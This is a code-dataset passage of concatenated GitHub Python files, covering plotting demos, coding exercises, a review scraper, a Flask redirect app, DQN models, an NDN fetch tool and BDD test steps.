plot_sin():\n plt.figure(1, dpi=50)\n x = np.linspace(-np.pi, np.pi, 100)\n plt.plot(x, np.sin(x))\n plt.show()\n\ndef plot_sca():\n \"\"\"sca()函数,选择子图\"\"\"\n plt.figure(1, dpi=50)\n ax1 = plt.subplot(211) # 创建子图ax1\n ax2 = plt.subplot(212) # 创建子图ax2\n\n x = np.linspace(0, 10, 100)\n plt.sca(ax1) # 选择子图ax1\n plt.plot(x, np.exp(x))\n\n plt.sca(ax2)\n plt.plot(x, np.sin(x))\n\n plt.show()\n\ndef plot_over_one_curve():\n \"\"\"在一张表中画多个曲线\"\"\"\n x = np.linspace(-np.pi * 2, np.pi * 2, 100)\n plt.figure(1, dpi=50)\n\n for i in range(1, 5):\n plt.plot(x, np.sin(x / i))\n\n plt.show()\n\ndef plot_hist():\n \"\"\"绘制直方图\"\"\"\n plt.figure(1, dpi=50)\n data = [1, 1, 1, 2, 2, 2, 3, 3, 4, 5, 5, 6, 4]\n plt.hist(data) # 只要传入数据,直方图就会统计数据出现的次数\n plt.show()\n\ndef plot_scatter():\n \"\"\"绘制散点图\"\"\"\n x = np.arange(1, 10)\n y = x * 2 + 1\n fig = plt.figure()\n # c = 'r'表示散点的颜色为红色,marker 表示指定散点的形状为圆\n plt.scatter(x, y, c='r', marker='o')\n plt.show()\n\ndef plot_pie():\n \"\"\"绘制饼图\"\"\"\n data = [100, 500, 300]\n fig = plt.figure(dpi=80)\n plt.pie(data, # 每个饼块的实际数据,如果大于1,会进行归一化,计算百分比\n explode=[0., 0., 0.1], # 每个饼块里中心的距离\n colors=['y', 'r', 'g'], # 每个饼块的颜色\n labels=['A part', 'B part', 'C part'], # 每个饼块的标签\n labeldistance=1.1, # 每个饼块标签到中心的距离\n autopct='%1.1f%%', # 百分比的显示格式\n pctdistance=0.5, # 百分比到中心的距离\n shadow=True, # 每个饼块是否显示阴影\n startangle=0, # 默认从x轴正半轴逆时针起\n radius=1) # 饼块的半径\n plt.show()\n\ndef plot_load_file():\n \"\"\"加载文件并绘图\"\"\"\n data = np.loadtxt('data.txt', delimiter=',')\n # print(type(data)) # \n # print(data.shape) # (21, 2)\n # ro表示每个数据在图表上打印的是红色的圆点\n plt.plot(data[:, 0], data[:, 1], 'ro')\n plt.show()\n\n\nif __name__ == '__main__':\n # simple_test()\n # simple_test2()\n # simple_test3()\n # simple_test4()\n # plot_sin()\n # plot_sca()\n # plot_over_one_curve()\n # plot_hist()\n # plot_scatter()\n # plot_pie()\n plot_load_file()\n","repo_name":"liangjisheng/python-demos","sub_path":"matplotlib/matplotlib_1.py","file_name":"matplotlib_1.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36458042565","text":"import sys\nsys.dont_write_bytecode = True\n\nfrom harbor3d import Dock, Shipwright\nfrom harbor3d.util import edges_util\nimport numpy as np\nimport os\n\nsys.path.append(os.sep.join(os.path.dirname(os.path.abspath(__file__)).split(os.sep)[:-1]))\nfrom const import Const as MasterConst\n\nclass Const:\n edges = [(1.50,0.66),(1.50,0.76),(1.50,0.86),(1.50,1.11),(1.50,1.21),(1.49,1.31),(1.47,1.40),(1.45,1.50),(1.42,1.59),(1.39,1.68),(1.35,1.77),(1.30,1.86),(1.25,1.94),(1.19,2.02),(1.13,2.10),(1.06,2.17),(0.99,2.24),(0.91,2.30),(0.83,2.36),(0.75,2.41),(0.66,2.46),(0.57,2.50),(0.48,2.53),(0.39,2.56),(0.29,2.58),(0.20,2.60),(0.10,2.61),(-0.00,2.61),(-0.10,2.61),(-0.20,2.60),(-0.29,2.58),(-0.39,2.56),(-0.48,2.53),(-0.57,2.50),(-0.66,2.46),(-0.75,2.41),(-0.83,2.36),(-0.91,2.30),(-0.99,2.24),(-1.06,2.17),(-1.13,2.10),(-1.19,2.02),(-1.25,1.94),(-1.30,1.86),(-1.35,1.77),(-1.39,1.68),(-1.42,1.59),(-1.45,1.50),(-1.47,1.40),(-1.49,1.31),(-1.50,1.21),(-1.50,1.11),(-1.50,0.86),(-1.50,0.77),(-1.50,0.67),(-1.50,-2.05),(1.50,-2.05)]\n x_range, y_range = edges_util.size(edges)\n x_min, x_max = x_range\n\ndef chest_to_neck(sw: Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1).rotate(MasterConst.Chest.chest_to_neck_side_bend_right).void()\n return sw.parent(geta_2).rotate_x(MasterConst.Chest.chest_to_neck_adduction)\n\ndef chest_to_right_arm(sw: Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Arm.z_position_chest_height_ratio)\\\n .move_xy(Const.x_max, MasterConst.Arm.y_position)\n geta_3 = sw.parent(geta_2).rotate(np.pi/2).void()\n return sw.parent(geta_3).rotate(0.,MasterConst.Arm.Right.shoulder_flexion).void()\n\ndef chest_to_left_arm(sw:Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Arm.z_position_chest_height_ratio)\\\n .move_xy(Const.x_min, MasterConst.Arm.y_position)\n geta_3 = sw.parent(geta_2).rotate(np.pi/2, np.pi).void()\n return sw.parent(geta_3).rotate(0.,-MasterConst.Arm.Left.shoulder_flexion).void()\n\ndef chest_to_backpack(sw:Shipwright):\n geta_1 = sw.void(MasterConst.Chest.module_length)\n geta_2 = sw.parent(geta_1, MasterConst.Backpack.z_position_chest_height_ratio)\\\n .move_y(MasterConst.Backpack.y_position_chest_offset)\n return sw.parent(geta_2).rotate_x(np.pi/2)\n\ndef main():\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\n fname = path.split(os.sep)[-1] + '.stl'\n\n sw = Shipwright(Dock())\n\n chest = sw.void(MasterConst.Chest.module_length)\n chest.add_ribs(edges=Const.edges)\n chest.add_ribs([-0.01, 1.01], [(0.,0.)])\n chest.order_ribs()\n \n sw.generate_stl_binary(path, fname, divided=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MurataUni/ModelingScript_Eltemus","sub_path":"chest/chest.py","file_name":"chest.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28656372939","text":"valores = list()\nfor v in range(0,5):\n valor = int(input('Digite um valor: '))\n if v == 0 or valor > valores[-1]:\n valores.append(valor)\n print('Adicionado no final da lista.') \n else:\n pos = 0\n while pos < len(valores):\n if valor <= valores[pos]:\n valores.insert(pos, valor)\n print(f'Adicionado na posição {pos} da lista.')\n break\n pos += 1\nprint('-='*30)\nprint(valores)","repo_name":"fpgodoy/Exercicios-Python","sub_path":"ex080.py","file_name":"ex080.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3348554352","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n self.res, self.k = [], k\n self.dfs(1, [], n)\n return self.res\n\n def dfs(self, first, path, n):\n if len(path) == self.k:\n self.res.append(path)\n return\n for i in range(first, n+1):\n self.dfs(i+1, path+[i], n)\n","repo_name":"sasankyadavalli/leetcode","sub_path":"combine_77.py","file_name":"combine_77.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6877678235","text":"import os\nimport urllib\n\nfrom flask import Flask, redirect, render_template, request\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom whitenoise import WhiteNoise\nfrom wtforms_sqlalchemy.orm import model_form\n\nflask_app = Flask(__name__)\napp = WhiteNoise(flask_app, root='static/')\n\nflask_app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', default='postgres://dsanders@localhost/wheres_the_changelog')\nflask_app.secret_key = 'derp'\n\ndb = SQLAlchemy(flask_app)\nmigrate = Migrate(flask_app, db)\n\n\nclass Changelog(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n changelog_url = db.Column(db.String)\n package_name = db.Column(db.String)\n\n\nChangelogForm = model_form(Changelog, base_class=FlaskForm)\n\n\n@flask_app.route('/', methods=('GET', 'POST'))\ndef main():\n form = ChangelogForm(data={'package_name': request.args.get('new_package')})\n if form.validate_on_submit():\n changelog = Changelog(package_name=form.package_name.data, changelog_url=form.changelog_url.data)\n db.session.add(changelog)\n db.session.commit()\n return redirect('/')\n changelogs = Changelog.query.all()\n\n return render_template('base.html', changelogs=changelogs, form=form)\n\n\n@flask_app.route('/')\ndef where_is_it(package_name):\n try:\n the_changelog = Changelog.query.filter_by(package_name=package_name).first()\n return redirect(the_changelog.changelog_url)\n except:\n return redirect('/?{}'.format(urllib.parse.urlencode({'new_package': package_name})))\n","repo_name":"shangxiao/wheres-the-changelog-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37571059658","text":"from bs4 import BeautifulSoup\nimport urllib\nimport urllib.request as ur\nimport pandas as pd\nfrom datetime import datetime\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk import ngrams\nfrom collections import Counter\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom nltk.stem import WordNetLemmatizer\nimport nltk\nfrom urllib.request import Request, urlopen\nimport random\nimport matplotlib.pyplot as plt\n\ndef comment_scrape(WEBSITE, Page):\n comments = []\n rates = []\n dates = []\n\n # type in the website you want to scrape and analyze the trends over time!!!!!\n # example WEBSITE = 'www.betfair.com'\n \n user_agents_list = [\n 'Mozilla/5.0 (iPad; CPU OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',\n 'python-requests/3.10.0',\n 'python-requests/2.14.0',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1',\n 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363'\n ]\n \n\n for page in range(1, Page):\n if page == 1:\n req = Request(\n url='https://www.trustpilot.com/review/'+ WEBSITE, \n headers={'User-Agent': random.choice(user_agents_list)}\n )\n# url = ur.urlopen('https://www.trustpilot.com/review/'+ WEBSITE)\n\n else:\n req = Request(\n url='https://www.trustpilot.com/review/'+ WEBSITE +'?page=' + str(page), \n headers={'User-Agent': random.choice(user_agents_list)}\n )\n \n# url = ur.urlopen('https://www.trustpilot.com/review/'+ WEBSITE +'?page=' + str(page))\n \n content = urlopen(req).read()\n# content = url.read()\n soup = BeautifulSoup(content, 'lxml')\n\n table_com_date = soup.findAll('div',attrs={\"class\":\"styles_reviewContent__0Q2Tg\"})\n table_rate = soup.findAll('div',attrs={\"class\":\"styles_reviewHeader__iU9Px\"})\n\n # scrape rates\n for x in table_rate:\n rates.append(x['data-service-review-rating'])\n\n # scrape comments and dates\n for x in table_com_date:\n\n comments.append(x.find('p').text)\n date = x.find('p', attrs = {\"class\": \"typography_body-m__xgxZ_ typography_appearance-default__AAY17 typography_color-black__5LYEn\"}).text[20:]\n date = datetime.strptime(date , \"%B %d, %Y\")\n dates.append(date)\n \n d = {'Review': comments, 'Rate': rates,'Date': dates }\n df = pd.DataFrame(d)\n df = df.set_index(['Date'])\n \n # print ratio\n print('Rate counts shows below:')\n print(df['Rate'].value_counts())\n print('\\nRate counts ratio shows below:')\n print(df.Rate.value_counts(normalize=True))\n \n print('\\nReview groupby year shows below:')\n print(df.groupby(df.index.year)['Review'].count())\n \n print('\\nScraped ' + str(len(df)) + ' reviews of ' + WEBSITE)\n \n return df\n\ndef trends_analyze(filename, Rate, Date):\n \n # read\n df = pd.read_csv (filename, lineterminator='\\n')\n\n # joins all the sentenses\n df['Review'] = [df['Review'].iloc[i].replace(\"\\r\", \" \") for i in range(len(df['Review']))]\n df['Date'] = [datetime.strptime(df['Date'].iloc[i], \"%Y-%m-%d\") for i in range(len(df['Review']))]\n df = df.set_index(['Date'])\n df = df.loc[df['Rate'] == Rate].loc[Date]\n \n sentence = \" \".join(df['Review'])\n # creates tokens, creates lower class, removes numbers and lemmatizes the words\n new_tokens = word_tokenize(sentence)\n new_tokens = [t.lower() for t in new_tokens]\n new_tokens =[t for t in new_tokens if t not in stopwords.words('english')]\n new_tokens = [t for t in new_tokens if t.isalpha()]\n\n # #counts the words, pairs and trigrams\n counted = Counter(new_tokens)\n counted_2= Counter(ngrams(new_tokens,2))\n counted_3= Counter(ngrams(new_tokens,3))\n\n # #creates 3 data frames and returns thems\n word_freq = pd.DataFrame(counted.items(),columns=['word','frequency']).sort_values(by='frequency',ascending=False)\n word_pairs =pd.DataFrame(counted_2.items(),columns=['pairs','frequency']).sort_values(by='frequency',ascending=False)\n trigrams =pd.DataFrame(counted_3.items(),columns=['trigrams','frequency']).sort_values(by='frequency',ascending=False)\n \n return word_freq, word_pairs, trigrams\n \ndef plot_chart(word_freq, word_pairs, trigrams):\n # create subplot of the different data frames\n fig, axes = plt.subplots(3,1,figsize=(9,15))\n sns.barplot(ax=axes[0],x='frequency',y='word',data=word_freq.head(30))\n sns.barplot(ax=axes[1],x='frequency',y='pairs',data=word_pairs.head(30))\n sns.barplot(ax=axes[2],x='frequency',y='trigrams',data=trigrams.head(30))\n \n return \n\ndef review_star_split(df):\n df['Rate'] = df['Rate'].astype(float)\n \n fig, axes = plt.subplots(nrows=1, ncols=2,figsize=(9, 4))\n\n df['Rate'].plot(kind='hist', edgecolor='black',ax=axes[0])\n axes[0].set_title(\"Review Star Distribution\")\n \n df = df.groupby([df.index.year, \"Rate\"]).count()\n df = df.groupby(level=0, group_keys=False).apply(lambda x:100 * x / float(x.sum()))\n df.unstack().plot(kind='bar', stacked=True, ax=axes[1])\n \n axes[1].set_title(\"Review Star Percentage over Time\")\n axes[1].legend(title=\"\")\n plt.show()\n return\n\ndef review_volume_trend(df):\n df['Rate'] = df['Rate'].astype(float)\n \n fig = plt.figsize=(6, 6)\n df = df.groupby(df.index.year).count().pop('Review')\n df.plot(kind='bar', stacked=True)\n plt.title(\"Review Volume Trend\")\n plt.show()\n\n return\n\ndef review_pie_chart(df):\n \n df['Rate'] = df['Rate'].astype(float)\n \n fig, axes = plt.subplots(nrows=3, ncols=4,figsize=(12, 9))\n \n number_group = df.groupby(df.index.year).ngroups\n \n df = df.groupby([df.index.year, \"Rate\"]).count()\n df = df.groupby(level=0, group_keys=False).apply(lambda x:100 * x / float(x.sum()))\n\n \n for i, e in enumerate(df.index.levels[0]):\n yy = df.loc[e][\"Review\"].tolist()\n\n axes[i//4 , i%4].pie(yy, autopct='%1.1f%%', shadow=True, startangle=90)\n axes[i//4 , i%4].set_title(e)\n \n plt.show()\n \n return\n\n# Single Company (1)\n\nWEBSITE = 'williamhill.com'\nPage = 150\ndf = comment_scrape(WEBSITE, Page)\ndf.to_csv('review.csv')\n\n# Single Company (2)\nfilename = 'review.csv'\n\nRate = 1\nDate = '2020'\n\nword_freq, word_pairs, trigrams = trends_analyze(filename, Rate, Date)\nplot_chart(word_freq, word_pairs, trigrams)\n\n# Multi Company (1)\nWEBSITE = ['www.888.com', 'www.ladbrokes.com', 'www.skybet.com', 'www.paddypower.com', 'williamhill.com']\nPage = [30, 113, 73, 106, 197]\n\ndf_bag = pd.DataFrame()\n\nfor i in range(len(WEBSITE)):\n \n df = comment_scrape(WEBSITE[i], Page[i])\n df_bag = pd.concat([df_bag, df])\n \ndf_bag.to_csv('review.csv')\n\n# Multi Company (2)\nfilename = 'review.csv'\n\nRate = 5\nDate = '2012'\n\nword_freq, word_pairs, trigrams = trends_analyze(filename, Rate, Date)\nplot_chart(word_freq, word_pairs, trigrams)\n\n# review star split percentage\n\nreview_star_split(df_bag)\n\n# review volume trend\n\nreview_volume_trend(df_bag)\n\n# pie chart of reviews\n\nreview_pie_chart(df_bag)","repo_name":"aaronsxzhao/InvestmentAnalyst","sub_path":"online casino major app platform review analysis/website_scrape/comments_scrape.py","file_name":"comments_scrape.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1450261515","text":"import os\nimport sys\nimport argparse\nfrom ...encoding import Name, InterestParam\nfrom ...appv2 import NDNApp, pass_all\nfrom ...security import KeychainDigest\nfrom ...types import InterestNack, InterestTimeout, InterestCanceled, ValidationFailure\n\n\ndef add_parser(subparsers):\n parser = subparsers.add_parser('Fetch-Data', aliases=['peek', 'fd', 'fetch-data'])\n parser.add_argument('-o', '--output', metavar='FILE',\n help=\"write the AppParam into a file. '-' for stdout\")\n parser.add_argument('-l', '--lifetime', metavar='LIFETIME', default=4000, type=int,\n help='set InterestLifetime, in milliseconds')\n parser.add_argument('-p', '--prefix', action='store_true',\n help='set CanBePrefix')\n parser.add_argument('-f', '--fresh', action='store_true',\n help='set MustBeFresh')\n parser.add_argument('-a', '--app-param', metavar='APP-PARAM',\n help=\"set ApplicationParameters from a file, '-' for stdin\")\n parser.add_argument('name', metavar='NAME',\n help='name or name prefix of the desired Data packet')\n parser.set_defaults(executor=execute)\n\n\ndef execute(args: argparse.Namespace):\n lifetime = args.lifetime\n try:\n name = Name.from_str(args.name)\n except (ValueError, IndexError):\n print(f'Invalid name: {args.name}')\n return -1\n\n try:\n if args.app_param:\n if args.app_param == '-':\n app_param = sys.stdin.read().encode()\n else:\n with open(os.path.expandvars(args.app_param), 'rb') as f:\n app_param = f.read()\n else:\n app_param = None\n except (ValueError, OSError, IndexError):\n print('Unable to read the input file')\n return -2\n\n app = NDNApp()\n\n async def after_start():\n try:\n print(f'Sending Interest {Name.to_str(name)},'\n f' {InterestParam(must_be_fresh=args.fresh, can_be_prefix=args.prefix, lifetime=lifetime)}')\n data_name, content, context = await app.express(\n name, validator=pass_all,\n must_be_fresh=args.fresh, can_be_prefix=args.prefix, lifetime=lifetime,\n app_param=app_param)\n meta_info = context['meta_info']\n\n print(f'Received Data Name: {Name.to_str(data_name)}')\n print(meta_info)\n if content:\n print(f'Content: (size {len(bytes(content))})')\n if args.output:\n if args.output == '-':\n print(bytes(content).decode())\n else:\n with open(os.path.expandvars(args.output), 'wb') as f:\n f.write(bytes(content))\n except InterestNack as e:\n print(f'Nacked with reason={e.reason}')\n except InterestTimeout:\n print('Timeout')\n except InterestCanceled:\n print('Local forwarder disconnected')\n except ValidationFailure:\n print('Data failed to validate')\n finally:\n app.shutdown()\n\n app.run_forever(after_start())\n","repo_name":"named-data/python-ndn","sub_path":"src/ndn/bin/tools/cmd_fetch_data.py","file_name":"cmd_fetch_data.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"2227695815","text":"\"\"\" Guessing game\nProgram selects a random number and then the user has to guess it. User selects the difficulty (Easy/Hard)\nwhich sets the number of attempts they get to guess the number\nIf the guess is right, hurrah but if the guess is wrong, the program hints by telling if the guess is \nhigher or lower than the number \n\"\"\"\n\n# Choose a number\nimport random\nnum = random.randint(0, 500)\n\n# Welcome User\nprint(\"Welcome to this Guessing Game - Higher or Lower\")\nprint(\"The number is between 0 & 500\")\n\n# Select Difficulty\ndifficulty = int(input(\"\\nSelect Difficulty for the game: \\n 1. Easy (10 attempts)\\n 2. Hard (3 attempts)\\n===> \"))\nif difficulty == 1:\n choice = 10\nelif difficulty == 2:\n choice = 3\n\nprint(\"Let's begin!\\n \\n\")\n\n# Ask for guesses\nwhile choice > 0:\n guess = int(input(\"What is your guess?\\n===> \"))\n if guess == num:\n print(\"Yes! That's the number\")\n break\n else: \n print(\"That's a wrong guess!\")\n if guess > num: \n print(\"That's high! Number is smaller than this.\")\n else:\n print(\"That's lower! Number is bigger than this.\") \n choice -= 1 \n \n print(f\"\\n{choice} attempts left.\\n\")\n if choice == 0:\n print(\"Oops! You couldn't guess the number. No attempts left. Play again!\")","repo_name":"sypai/100DaysOfPython","sub_path":"Day12/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6331575869","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\narr = [0] * (n+1)\nfor i in range(1,n+1):\n arr[i] = max(arr[i],arr[i-1])\n t, p = map(int,input().split())\n if i+t-1 > n:\n continue\n arr[i+t-1] = max(arr[i-1]+p,arr[i+t-1])\n\nprint(arr[n])\n\n","repo_name":"cksdud150/HTG","sub_path":"7_2/14501.py","file_name":"14501.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8364868860","text":"import random\nfrom collections import namedtuple\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nTransition = namedtuple('Transition',\n ('state', 'action', 'next_state', 'reward', 'done'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass DQN(nn.Module):\n\n def __init__(self, in_channels, num_actions):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\n self.fc4 = nn.Linear(3136, 512)\n self.fc5 = nn.Linear(512, num_actions)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n x = F.relu(self.fc4(x.view(x.size(0), -1)))\n return self.fc5(x)\n\n\nclass DuelingDQN(nn.Module):\n\n def __init__(self, in_channels, num_actions):\n super(DuelingDQN, self).__init__()\n self.num_actions = num_actions\n\n self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\n\n self.fc1_adv = nn.Linear(3136, 512)\n self.fc1_val = nn.Linear(3136, 512)\n\n self.fc2_adv = nn.Linear(512, num_actions)\n self.fc2_val = nn.Linear(512, 1)\n\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.conv1(x))\n x = self.relu(self.conv2(x))\n x = self.relu(self.conv3(x))\n x = x.view(x.size(0), -1)\n\n adv = self.relu(self.fc1_adv(x))\n val = self.relu(self.fc1_val(x))\n\n adv = self.fc2_adv(adv)\n val = self.fc2_val(val).expand(x.size(0), self.num_actions)\n\n x = val + adv - adv.mean(1).unsqueeze(1).expand(x.size(0), self.num_actions)\n return x\n","repo_name":"ManuelEberhardinger/DQN-Atari-Project","sub_path":"DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3173564380","text":"import angr\nimport logging\nlw = logging.getLogger(\"CustomSimProcedureWindows\")\n\nclass inet_addr(angr.SimProcedure):\n\n def run(self, cp):\n try:\n print(self.state.mem[cp].string.concrete)\n except:\n print(self.state.memory.load(cp,0x20))\n return 123456\n","repo_name":"csvl/SEMA-ToolChain","sub_path":"src/SemaSCDG/procedures/windows/custom_package/inet_addr.py","file_name":"inet_addr.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"73842682791","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if not root:\n return []\n queue = [root]\n res = []\n while queue:\n current_level = []\n next_queue = []\n for i in queue:\n current_level.append(i.val)\n if i.children:\n for j in i.children:\n next_queue.append(j)\n res.append(current_level)\n queue = next_queue\n return res","repo_name":"YuanyuanQiu/LeetCode","sub_path":"0429 N-ary Tree Level Order Traversal.py","file_name":"0429 N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3232174004","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\n\nfrom behave import *\n\nfrom test import bdd_util\nfrom features.testenv.model_factory import *\n\nfrom django.test.client import Client\nfrom mall.models import *\nfrom modules.member.models import *\nfrom mall.promotion.models import CouponRule\nfrom utils.string_util import byte_to_hex\n\n@when(u\"{user}选择会员\")\ndef step_impl(context, user):\n context.member_ids = []\n for raw in context.table:\n query_hex = byte_to_hex(raw['member_name'])\n member = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex)\n context.member_ids.append(str(member.id))\n\n@when(u\"{user}批量修改等级\")\ndef step_impl(context, user):\n member_ids = context.member_ids\n data = json.loads(context.text)[0]\n grade_name = data['member_rank']\n grade_id = MemberGrade.objects.get(webapp_id=context.webapp_id, name=grade_name).id\n args = {}\n if data['modification_method'] == '给选中的人修改等级':\n if not member_ids:\n return\n args['update_status'] = 'selected'\n args['ids'] = '-'.join(member_ids)\n elif data['modification_method'] == '给筛选出来的所有人修改等级':\n args['update_status'] = 'all'\n if hasattr(context, 'filter_str'):\n args['filter_value'] = context.filter_str\n\n\n args['grade_id'] = grade_id\n response = context.client.post('/member/api/batch_update_member_Grade/', args)\n bdd_util.assert_api_call_success(response)\n\n@when(u\"{user}批量添加分组\")\ndef step_impl(context, user):\n member_ids = context.member_ids\n data = json.loads(context.text)[0]\n tag_name = data['grouping']\n tag_id = MemberTag.objects.get(webapp_id=context.webapp_id, name=tag_name).id\n args = {}\n if data['modification_method'] == '给选中的人添加分组':\n if not member_ids:\n return\n args['update_status'] = 'selected'\n args['ids'] = '-'.join(member_ids)\n elif data['modification_method'] == '给筛选出来的所有人添加分组':\n args['update_status'] = 'all'\n if hasattr(context, 'filter_str'):\n args['filter_value'] = context.filter_str\n\n\n args['tag_id'] = tag_id\n response = context.client.post('/member/api/batch_update_member_tag/', args)\n bdd_util.assert_api_call_success(response)\n\n@when(u'{webapp_user}给\"{member}\"调分组')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/update_member_tag_or_grade/'\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n tag_ids = []\n data = json.loads(context.text)\n for tag_name in data:\n tag_ids.append(str(MemberTag.objects.get(webapp_id=context.webapp_id, name=tag_name).id))\n args = {\n 'type': 'tag',\n 'checked_ids': '_'.join(tag_ids),\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n@when(u'{webapp_user}给\"{member}\"设等级')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/update_member_tag_or_grade/'\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)\n grade_name = data['member_rank']\n grade_id = MemberGrade.objects.get(webapp_id=context.webapp_id, name=grade_name).id\n\n args = {\n 'type': 'grade',\n 'checked_ids': grade_id,\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n\n@when(u'{webapp_user}给\"{member}\"发优惠券')\ndef step_impl(context, webapp_user, member):\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)[0]\n coupon_rule_name = data['name']\n count = data['count']\n coupon_rule_id = CouponRule.objects.get(owner_id=context.webapp_owner_id, name=coupon_rule_name).id\n\n args = {\n 'coupon_rule_id': coupon_rule_id,\n 'pre_person_count': count,\n 'member_id': json.dumps([member_id])\n }\n\n url = '/mall2/api/issuing_coupons_record/?_method=put'\n response = context.client.post(url, args)\n try:\n bdd_util.assert_api_call_success(response)\n except:\n #用来判断出错的提示信息\n context.response = response\n\n@when(u'{webapp_user}给\"{member}\"加积分')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/integral/'\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)\n\n args = {\n 'integral': data['integral'],\n 'reason': data['reason'],\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n 